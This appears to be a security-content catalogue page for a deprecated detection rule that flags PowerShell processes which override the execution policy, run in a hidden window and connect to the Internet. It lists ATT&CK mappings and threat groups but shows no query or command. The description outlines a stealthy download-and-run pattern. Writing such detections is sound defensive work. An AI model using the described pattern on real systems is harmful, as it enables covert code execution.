Malicious Powershell Process - Connect To Internet With Hidden Window

Description

This search looks for PowerShell processes started with parameters to modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it's overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Deprecated becaue hidden is not needed when download file with System.Net.WebClient.

Content Mapping

This content is not mapped to any local saved search. Add mapping


Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume

This search looks for PowerShell processes started with parameters to modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it's overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Deprecated becaue hidden is not needed when download file with System.Net.WebClient.

SPL Difficulty

None

Journey

Stage 3

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

Command and Scripting Interpreter

PowerShell

MITRE Threat Groups

APT19
APT28
APT29
APT3
APT32
APT33
APT39
APT41
BRONZE BUTLER
Blue Mockingbird
Chimera
Cobalt Group
CopyKittens
DarkHydrus
DarkVishnya
Deep Panda
Dragonfly 2.0
FIN10
FIN6
FIN7
FIN8
Frankenstein
Gallmaker
Gorgon Group
Inception
Kimsuky
Lazarus Group
Leviathan
Magic Hound
Molerats
MuddyWater
OilRig
Patchwork
Poseidon Group
Silence
Soft Cell
Stealth Falcon
TA459
TA505
TEMP.Veles
Threat Group-3390
Thrip
Turla
WIRTE
Wizard Spider
menuPass

Kill Chain Phases

Command and Control
Actions On Objectives

   Help

Malicious Powershell Process - Connect To Internet With Hidden Window Help

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

   Search

Open in Search